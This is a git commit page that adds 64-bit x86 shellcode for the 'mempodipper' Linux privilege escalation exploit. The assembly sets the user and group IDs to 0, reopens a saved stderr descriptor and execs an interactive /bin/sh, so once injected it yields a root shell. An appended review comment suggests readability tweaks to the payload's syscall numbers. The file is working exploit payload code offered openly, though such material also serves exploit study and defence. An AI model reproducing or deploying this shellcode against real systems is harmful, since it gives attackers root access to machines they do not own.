author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 04:37:23 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 04:37:23 +0100 |
commit | df106c579d69056f4bcef612f324d4ef0d71fb05 (patch) | |
tree | b32acfc76c303db7ac880ca054751b683c97ed80 /shellcode-64.s | |
parent | Move around the banner. (diff) | |
Add custom 64bit shellcode and preserve stderr.
Diffstat (limited to '')
-rw-r--r-- | shellcode-64.s | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh' ; rbx = //bin/sh
+shr rbx,0x8 ; remove leading / from rbx
+push rbx ; push rbx to stack
+mov rdi,rsp ; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i' ; rbx = '-i'
+push rbx ; push rbx to stack
+mov rcx,rsp ; set rcx to top of stack
+
+xor rax,rax ; rax = 0
+
+; so at this point:
+; rdi is a pointer to '/bin/sh'
+; rcx is a pointer to '-i'
+; rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax ; push rax to stack
+push rcx ; push rcx to stack
+push rdi ; push rdi to stack
+mov rsi,rsp ; set rsi (arg 2) to top of stack
+
+xor rdx,rdx ; rdx (arg 3) = 0
+
+mov al,0x3b ; al = 0x3b, which is the exec call
+syscall |
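Review bot: The header comment at the top of the hunk states `BITS 64` but not which OS syscall table the bare numbers 0x69, 0x6a, 0x21 and 0x3b come from, so a reader has to already know the ABI to follow the four `syscall` blocks. Naming them once with `equ` constants, e.g. `SYS_SETUID equ 0x69` and `SYS_EXECVE equ 0x3b`, and using the names in the `mov al,...` lines keeps the listing readable without changing any emitted byte. The header would also benefit from one line such as `; Target: Linux x86-64 syscall ABI (rax = nr; args in rdi, rsi, rdx)` so the convention the comments rely on is stated rather than implied.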